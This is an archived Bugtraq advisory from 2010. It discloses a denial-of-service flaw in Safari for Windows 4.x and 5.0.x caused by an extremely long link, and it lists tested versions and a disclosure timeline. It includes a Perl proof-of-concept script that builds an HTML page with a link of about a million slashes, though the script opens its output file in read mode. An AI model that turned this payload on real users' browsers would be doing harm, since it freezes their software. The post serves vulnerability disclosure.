Home page logo
/

bugtraq logo Bugtraq mailing list archives

Fwd: {Lostmon´s Group} Safari for windows Long link DoS
From: Lostmon lords <lostmon () gmail com>
Date: Wed, 4 Aug 2010 17:43:57 +0200

############################################
Safari for windows Long link DoS
Vendor URL:http://www.apple.com/safari/
Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html
Vendor notified:Yes exploit available: YES
############################################

Safari is prone vulnerable to Dos with a very long Link...
This issue is exploitable via web links like <a href="very long URL">
click here</a> or similar vectors. Safari fails to render the link
and it turn Frozen resulting in a Denial of service condition.

#################
Versions Tested
#################

I have tested this issue in win xp sp3 and a windows 7 fully pached.

Win XP sp3:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable

windows 7 Ultimate:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable

############
References
############

Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:

####################
Proof Of Concept
####################

#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon () gmail com http://lostmon.blogspot.com
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS
# generate the file open it with safari wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print "Usage: $0 <archivo.html>\n";

}

$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x
1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";

$datos = $cabecera . $payload . $fin;

open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Related Links
##############

vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon () gmail com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...


  By Date           By Thread  

Current thread:
  • Fwd: {Lostmon´s Group} Safari for windows Long link DoS Lostmon lords (Aug 04)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault